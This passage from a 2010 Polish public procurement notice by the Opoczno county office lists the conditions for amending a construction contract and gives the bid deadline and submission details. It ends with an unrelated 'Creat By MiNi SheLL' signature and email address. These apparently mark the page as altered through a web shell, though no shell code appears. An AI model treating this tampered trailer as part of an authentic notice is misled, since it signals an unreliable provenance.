2.	Możliwe zmiany  postanowień przyszłej umowy w stosunku do treści oferty, na podstawie której dokonany będzie  wybór Wykonawcy, oraz określenie warunków takiej zmiany. (144. ust.  1 Ustawy): np. 
a. wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin wykonania przedmiotu zamówienia. 
b. wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia, a nie wynikających z przyczyn leżących po stronie Wykonawcy. 
c. wystąpi konieczność wykonania robót dodatkowych.
d. zostały ujawnione wady opracowania projektowego, o których Zamawiający nie posiadał wiedzy, a które mają wpływ na termin lub koszt realizacji przedmiotu zamówienia. 
e. wprowadzenia zmian do projektu budowlanego przez projektanta po uprzednim uzgodnieniu i zatwierdzeniu ich przez Zamawiającego, zgodnie ze wszelkimi obowiązującymi normami i przepisami, w przypadku zmiany technologii wykonania robót lub materiałów polepszających estetykę i warunki użytkowe elementów robót. 
f. zmiany osób realizujących przedmiot umowy z uwagi na niezależne od Stron umowy okoliczności (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) dotyczące osób kluczowych dla realizacji umowy np. kierownika budowy, inspektora nadzoru, osób reprezentujących Strony.
Określenie warunków dokonywania ww zmian do umowy; Strona wnosząca o zmiany inicjuje zmianę pisemnie podając: opis zmiany, uzasadnianie zmiany, czas wykonania zmiany (jeżeli wymaga); wpływ zmiany na termin zakończenia realizacji umowy, przedstawia propozycję aneksu do umowy.
Uwaga: Wszystkie zmiany wymagają zgody Zamawiającego w formie sporządzonego i podpisanego przez obie strony aneksu. Każda ze stron jest upoważniona do wystąpienia o takie zmiany</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.opocznopowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a
26-300 Opoczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2010 godzina 12:30, miejsce: biuro podawcze w Starostwie Powiatowym, ul. Kwiatowa 1a, 26-300 Opoczno lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com